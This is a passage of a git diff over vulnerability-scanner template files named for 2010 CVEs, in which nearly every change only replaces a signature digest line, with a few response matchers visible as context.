200 - -# digest: 4a0a00473045022100f0785cdf3cf9ac8bcc08aeb27651d5ebc65a47874dc38cab7652bb3faf99887902207bb66b5147d1eef1f7cd71583b7571f3548ccb78a45bdfec32fc4d27423f8aed:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ffe55f4a84a28aada246d860a393831bbb04b3b4c3bfa35881a9c6986e53e5bb022100fe85e15e09312af70d1da0eb39dbfc9c56d06a7c1caf7945a3ef454369fab133:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 870b725ee9..96b850cc5a 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220512fa89c782f5d514471c6a2764e15c8021feb28a171b395f7c098e7e8847512022001f0986d58ecac7f2ade0147f9c74522fe355d8c97c0b9c99715a94c6df7afc4:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202e07770d458ab5d539b2e346ffcdda23c71fe408720c44c2a65b8af9c831a05f0220683a0cd02df006c51b84de7250b71676335f0ff1dc7d6446a4e98b7c335082ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index c6585d700e..a7f0ff27f8 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c409a1a4b3664fa1717cd99fbef8118476ced469e8f462d307a2798f48a367f202200d25bb45028da27f4c870b7e983ec3a12358998db3992b2b37e28815cf1fca72:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d0ec1f32f83536883f90451079c24214d9ac4530532a346a47921edcdcfe206c022047409d572e2970eb5febf666962d4b0e96c8d7b30c39f187ec50d7e4740decf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 6367d07d62..a69abc2aea 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022030bcc6e2265b88da4638695718ef75896f2f7f9b71945d4a36e8202e42a25c37022030daaa6070318c16740e9a3aed94e0141d313fec8e72a4da9e6a00018ba2dcfd:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008cff1fae7f46957f3e593775607e26bbdce7b4511bd8114413a8982ed49900c7022100856422548a54c32135482666ce8f9446212f607819b04b7a74e5dd20403ea567:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index e41a22bcf0..5d94fd669e 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b8e943384062b76428241ada8221979775f9458360453a98d677a4b3d77840e6022030feb2bb1202cf392258a024f4eb82eef009b40edaa1761607dd5ea26be3fefc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210099c41f414bc40bfa0deb3a9946984bac9bd29247f23df40296399ac63c8e514402205e9373898b2d61c6cb3ce0605c4f9e0543c0964d897078c5cf79b7ab67bf706f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index 2f6b2e19e5..489d911a54 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100969b7b1d3f0dd9c028a0d26950ac63a16e03ba2dc5c1a069d334f6ff10c1a9330221009bf556e59f682b306868e1a25e645bb82ffb38101460896ac55f5146c78c0800:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e22dadc76dc579d348b28c5cf6f7f4b93c81fb4bc03dba448686f67531d1d9ec022100d7503396b500e48ba48b7f2b664633592e59d8aff97da8b29ef1b2529ec66f84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index da2e575025..361f42a62d 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a263e1457accd2f7765b20d00522e79982e71f5d5fefe7afa02671089cf22e1f022002eb86a8c0a35ce523431b9407f901a28a2430b3a59529265cabff17bf3110c9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202a95413bf453a291cb3b0d1fab1bfca15cdfe5c1e9ebb660ac616c4386b2e8900221008120da1ef4e8871a707664cf323ffdea71c495e41e305053136f373be178a6db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index 18f7ba2006..e497e3c1ca 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022071e3e8ccbda9b98d1ae2890db2217eb9bcff7d1fdb94d6d449b0fcf0a2a697e1022028caea293cf7775926f7d99d97fa37f8a348dfadd6ec48cb23db70252753fc5e:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022016665941abc558092a2aa7f9643aed6df1bc5cdc48bc6018e79ce5053bfa03c20220031ffc2e0f89c6d0b6668d3ca3789118daa62046c8a9a9eabfed824df7c1fb4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index a767e81d42..87168ad024 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200f59c86b05b26b440da6888f90922f8d767b844409e8266c997a7ce0d28ba135022010443363756cd893173854f4bbed2b4fc2d5c2221fdb3ae2ff1f30c7a9172948:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022049d22e1939de15d6e55a7b912659a97db1bfa45422e11722412979df4f362c79022100cad7764ec4183c521ed9b4d387cdd5a77acc4f3f1a8bc412deca21a3b3cd2de0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 3a2cf51c1c..da326d6dc4 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100cdc2e39e4390d1a9ffb156ea63ccbda5696c36e763ff399c49f9e85dddaad829022100d21e28991afdfd5839a7d8ee87a9eb23a435e6243ed2d19eae779cbf01ccfc9b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100aac1b3165034ab53f38aac21c371fde176d0c9ab0e6145fc451fc9453b73bbc00220490df60e83f36bca29be3e0a8a9d59112d1d1d163bd86b84c5c926a616ead04b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 573fb716d3..cc74763a26 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022005f48408c11309f5e1c553d795eebe9cae5cf90798eb1581f6d1f7d07bfb3cd90221008ba34f63ed442a058320af5ae0f6f03a91ea61ace0b48a68ab7a9b141c956a14:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210091415f8a6db7d5c2e9c4767919236ede2e74476c908efda813489af3fe0e808e02203112c736cfb837a8ca578190351c897ee6a938befbc8d7af4420bdd239005b7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 444b983d63..9905997760 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e825d1d94d17cda9f7ae1be245a8bc53521461c554ed8c12a958853080948087022015e72623a627e849fe79f6ec026b7d81a3b6a34aa5051016a52167f18630e407:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fb859af3cc588bfd70f5f95ff9afc92e379664e22e60cb915f37ad6f974d26d5022053f23e12d23cf3db3ce5fcf35e97ba5a1e13ea585e00753fc4adadb7856295e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index c8ee5e660a..c0dda57e00 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a3467a9574504b23f2dbe4521b999c9aea7a8d13a489d6cc88202ef98f8f5458022100ba52c584f05e3dc1ecb10901d9a1153994c91effaa7fa730db910af97c3e13c3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205caf87a36617361bab1e1fa3948040804490f75c467cd3d028f51486f67a8106022100fe272e2f25192f18bce70299752186c06f0e72f6aae4051892e92f3dcf21b869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 4d0a549126..b82f664855 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220272df8ec3f14ce6291d8451f3211b9383aa379d6f0cfaab5b8da1045bf23b9f9022100ac30d6b384061ba0b3761869ec4e549ffbedae7a9476a970b90c2c265dde8625:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009c77e2616deefecec307634c5ccf1365b0183e094fb0d8e70d7a676e4c258ad1022100dddc6bffe3d73bae75f3547aa25e40b953dd94367d9eb101a90e114f163ec3fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index 1aed655da5..98746511ad 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200b21106e9029d4da86bd348fd6cefda13514098393858fd82bb09463a3eb3847022100a6fc141de252da8d324693ba1e2ae4a1652fbfd93128c18cfb8f09cab9ccf6cf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100980e30bfc87f1fc6ef568ca263411f054e12dd12f5f5eab26faae13659115d85022030adcf7b65ac42606c99ab6f3a83580a17174ecb455ef471b3c32a0d8643a7d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index 2f613b2d07..42f715a4fa 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022073f1f8cfd138222ec9a957029fe654b6fda25f23843b3f18ec0cc37942425b8d022100f146719b8e675bb62598d45326c1eba3d879b27b3f7d6b4e38acea0c0435f178:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207760e557a300ded8e38cb27a237ed7dba7a229fe45ed00fdeffa0a8ad8eb5328022034efbedf574c03565c2f1f66ebda22372c021efb8dd38fa035506356b3df47a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index f589f4b62a..f9bc253844 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201c3c70a243b4b6f0546c06ea1b287327ca1e4dafbddecacf120e7baf65a616800220069b91056ef859e40105667296c092ffcd1ea89e7118e0de6bfc0ffa33de0020:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201334e5fed4173e0f6205a6d345b3f3cd51e7d801a9dc7903700e65ac90859d1a02207846b5ed01d3e0d12479cc2a74fec089e287bc1303bbfc4c02fc9a45bdf49530:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index d20b877e60..d4343a0a81 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a5048b34d3f92a4653313eceb83555c5794b55c5e1f5988bce9e12b02058ad5502203fd0ceae1419225f4018c52dcf065a3bfe05c59afe4abc52336cda0673bc9de3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008b476aed4040c6be13645630603e590e8021dc10e10852d97a8f58cec8b7ddf402207c6104f1549462fec5d845edb788065421a0e108d593bea0a39fc4d2d7e35ec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 62056df7c2..a55e4372c2 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e416e882c8858cb4842431d331d1454f7756c6f88d821b7555fd8e317f1678ec0220120b53bf3c8bd0789ae35ed115c433c2d22084c38c62b27d8afee0dd11f2f26f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f266f3238143ee83f19568f41730f13011d512240c16e99376c51f7cabd730b2022100d553229b3c9fdb1abecdc2b3e680a7ae11afe1c973e85fc15bd47838d1caba6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index f71046234c..4c456ca768 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c10ec1082a45397da1a58c7644d1cdc47de8862f16932a58f856e3f272e7578d0220651958178f10333f8b4955a05d885e3a9944f233ae2b51dd8633db9a704d5552:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e6bffcceb69da702120fa0e06e0e80f574d0909b2b1d4f7219cfa3700edb88010220260c13c65f149246f71a7f7fde093f3a53a68e959e3af6989770cdd34e6ce192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index 77bef17063..ad967a1c4b 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -36,5 +36,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 490a0046304402207fda4f63cf498f1da6e7e4085cb66fa1bba9d344d1a415768a78fafc87bb35b6022020cfdc90d513953776229ff7e434a2c875e7e9522cf7710ce6689575843ca651:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d0bd93b680c557ea607dab515bf0edbff2009dad813e9af8a0cbb66b7abbffa6022100ec82155b472ea8920a706a9475f607c68be4ddebfc830ab2174bd6936d2f9295:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 358c24864c..05de48106e 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e414cd0ef4e79e98f2f24795401c2ef50b62672b0527c49faab21318c65e8584022059cf083687b0ed430293cdced98bceae477228f2e708bc23d9e7b3c2801088fb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d2543cb98007969a006d90c0d285b1c016afa2a3f84585fdacc23615a849a6020220732d040e07f978d66a5239454b35df672c5304fdff0de60459af23c94ed50d4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 0e9d1bfe35..4ed826f9fc 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100affbe9de14bea86ced242c409bf1be399d3f664c582a4fbb611927a3c0f8c74f022100da55a2693d3a640cc5158294545532bf299edb394ee7cd6f3f5cd14ab75ee26e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022019d77909e1d6b1602fa3fde80fcbaaf3f72796a6a452502b9b7bbb53a3d97e5d022100d94f905cf0237b442fb288c984576d615e5a81dfe2ccbd6a9d5dce76799f5f18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index c6ac4477cb..d650135971 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220203923d9d5f13905040aa4b25576ff325b2ee041973896d26beeab3a89705f3e02210092186baf0e4dd1e760fc0658227d749d5d03bd930c28e73b586698fe5b915f2a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e276e1ce83063e29371fcb0cbf133d4d8b5cc7bf1226d3fb8b8cff8c825f7a8d022069aba3743fc58e05231f06ba00ad95869df680478363e04f25c8716d1e38f3ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 474ee0ae9a..4628471888 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f1d7941da86af37675cb4c2c78add8f9b95897835667c28876e4f724f2474957022100ae45e62512178efde3ad48510835d446ce0623c2f02ff05a641739a136935321:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022047d6bc7d0c160fe2cdb50c2520d8e169ebea38d4c66d08770288dfefd2f21a7602202a694f43cda9fee7f355a6e0f90f93ad197e86c16d34cc204b0c5233ebd6f92a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index feb71cea4b..d283a1d137 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200ed5fb87e2a33bf5ea87fde857f5e0d0af572666c3e001344fee08fb02657430022100abe5837a592a392b24608de4e555963137fdb3b5c6d85f504d6886ca61854402:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008126ceeb9565030c10883b0382918cf35e59ba6da2662bd291a0cd3896cefc58022020d967c5d51fd71940269240b0690155eb57fb97dd8c09abf513eb0acb26c528:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index d0f5cdbb6a..006900d409 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210094a10554d8aadc5103d28e0cc09cffd0ef6ee233b7a2261ab74d118f22bc50c5022100b7e37e77db708e84fd958e5b4235fd8e61dcda00a5aa540935aa479750c4976d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022045da60d73761c92dcd0297af2690b40beacc10eda7006a2d0296578a3a0874cd022100f958516a2f43675a3fe3fbfa07e1dacef8ff9d2a62caeb7f4f2f5159436f16b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index 3edfeb1d9b..24afef9404 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220230267e81d0271dcd214e715ad2ff5ba6deabc2ff8d0a4370448175a26af7cc80221008190c0d2abf72e59a50950852d7267d64fa264c2bf0377a591e24b7243e9cf20:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204d01054bfa34c9d2454c49988a5e0058074374f70b71b2bfee8a441ebcc6cb81022100c6598d424f0efd239c8bc7bb51b4e7f7f07134f344ad8cdcf8372899f239889b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 87ba5f7351..498314d6b2 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022028fccd450c42345475fa406646ddef49f4eaf7fcb923ef24f9c15d77d861ab9b022100b614d1b26accdb76324b35754f03b70b0192b821b692e6c37d9485ee840dfbfa:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d1da94582bc05509a7fc48e7cc9ec03b348ef0be10003e69fa7271929076de6b022100f6524db9905914aa14222804586857cc61864aaf106d9905996688fab5872826:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index ce45da9855..33a83b0249 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022079ae61826374812d0c51c30735f00eced9357c00c01f8c762394aa327247c7cd0220086eb47f6aaa1cd053efcbbe616e6e90405af19071a06ec3d6a1e64e4a0e0f43:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cd3c68b22a21cb3129da83edd03d73cc016afc8c1a27724a502491b17e2cedf002201ed63812310c6872961c7c3c25e3b0d9408013e913a13129f09e4ac293e39dab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 4d9948dc7a..945dcece25 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201a69f2f0f9dfc961a5d4026d1db14b569ea0b7f347db26f30c4e535747c87177022100a8bb1d92c3535d297bd314ff34a02e5efb456566b747164129c20955a96c4aac:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022008be213e44fa2b2aa0399f82fdbb7305acf0b4afc4cc2997dc08e63330d08d4902201208e8766b914dff24d5c75a5457483ad5348b34c062878e9943256075825306:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index 0843e6239f..fd87206525 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009daab6272cc7c804bf48a101ee9d93308a7f742ad3c0c41b3703346ac18bc214022100c1c09dd68f8a9c141e705e7fea898d380a3c5a05eb9fddf9a0861a8e029a9cbd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a99ccb65e9640c2681abcae6f0668e96ed0f9c0a036fca1ef11b55134e1cc79502204549a9f48a410f4c11fc047f74208f7db93c2fd4db73cef643b8516229ac1a63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index f5fde9ea3b..a2326aaa51 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d6b5ec93686994462121d61b11470e97d9ac6acabe1efe6e2be2836445629ba0022073d4f767163612f2d551350460e17d834756a53f0c0ec8de09e7295fe1c96779:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e81c6ea8834a24a53f9e631b66716d7004fc46485cbc939d986c7f685707f867022100eef436fe34107d067ca562f640b60fbe221676ed89b00729c3313dc75a9dc816:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 336cf6bc40..9aa3cf9e15 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220774eb84a8608b3b7cb66a816e0baebbb083fac24337aec05b1d2bf082757bc9602205c904ea6091d33bc9b052372b45cb9edf7e1cec1c1cca24aaae498a844e512d9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200e8d113d5599cacce6d6f297ecace410e84572e5fa5504736746124e28df4a5a022100bff64b502bd7b802fe5ab1e49947bacf19a6b7c55442cbe4c1a052b2231dee42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index bc66ef9a5b..90afeeca59 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022068fc8b128a1de4d7d682a6b24c6d7bedb4281ebe2c40ff85f1216cad76a6bd21022066d905184f8aa880f0d7ba59f9164ae6aa0f58a6d044f585128d2aafede4aa23:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cad5216273a3d635eb5cfa8e1699417858597dfc68934bbe28847a8984a087b2022100a14a93dc7134b733dc13e2eb1c989c8fbb1b8d844b2febe6613a6cf748f4ed5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index a65b3dd57e..e89c18b5fd 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200676a330db743f396d2bd8e66a51d6930c1ac7e42100f27afb319ec18fa03ad8022100cd6316b7274dc4637025b72af8fc8149187764e7d79318f1f04010e13c9bbc87:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207b7d486c084743ff9d3b1a55aa878b167078af66011146288e40e16f9af8f5ad022100bbc079a6646a19714a3ce7cbb6b093ef867b7da415d8027e28b18b70a686fa90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index ae691e56eb..125baaf198 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200afff45d0b734fa7b35d6ee96640607bb6a789630c3d90384831e41aa7cf2a4e022100e8597741a5e4544e2aacaf11a2f2d444bc4580aef1c36782eb4c6c75003daf65:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022032e5f9af6fd6299142affbba2f701ecc132889f49046ff3961e12406f52211b802206b252536a4b7d53e9b9c3622346a5ec9d193a3ef56cb4f8c323fe06c6708c050:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 842d17e8e1..e6f0492fc2 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -40,5 +40,4 @@ http: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' - -# digest: 4a0a00473045022066fd9576448f6693b3df35da0581e188942e954dd6b58a085f859d9eba46f9340221008398f405ba0d8658b08df4650909ab899769bb8700d2e7aee3b6b19ccd9c61b9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100eea8abdf93266daaff578b9c077c2d45488777700b5ad6849245681af65d2790022100d23ed050f846a6f25a1df494c588320763095f0eb54e3cf825ddcd0c410aaded:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 